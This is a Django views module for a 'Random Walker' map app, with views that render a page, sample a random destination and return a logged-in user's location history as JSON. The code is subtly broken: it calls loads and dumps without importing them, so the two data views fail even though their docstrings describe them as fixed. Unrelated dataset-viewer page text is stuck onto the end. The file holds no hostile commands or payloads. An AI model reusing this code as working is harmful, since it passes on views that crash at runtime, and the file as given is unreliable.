from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import requires_csrf_token, ensure_csrf_cookie
from django_mobile import get_flavour
from .models import Location, MapParameter
# Create your views here.
@ensure_csrf_cookie
def index(request):
    """
    Returns the Random Walker web page according to device
    """
    template = ('random_walker_engine/_random_walker_engine.html'
                if get_flavour() == 'full'
                else 'random_walker_engine/_m_random_walker_engine.html')
    return render(request, template)
@requires_csrf_token
def generate_new_destination(request):
    """
    Generates a new random location.

    Fix: non-POST requests used to fall off the end of the view and return
    None, which Django reports as a 500; they now get an explicit 405.
    """
    if request.method != 'POST':
        return HttpResponse(status=405)
    params = MapParameter(request)
    request_data = loads(request.body)
    new_destination = params.sample_destination(request_data['n_sample'])
    # Return the destination
    return HttpResponse(dumps(new_destination),
                        content_type="application/json")
@requires_csrf_token
@login_required
def show_location_history(request):
    """
    Query previous points and return the geojson for plot.

    Fix: non-POST requests used to return None (a 500 in Django); they now
    get an explicit 405 response.
    """
    if request.method != 'POST':
        return HttpResponse(status=405)
    params = MapParameter(request)
    previous_points = params.get_location_history(toJson = True)
    return HttpResponse(dumps(previous_points),
                        content_type="application/json")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.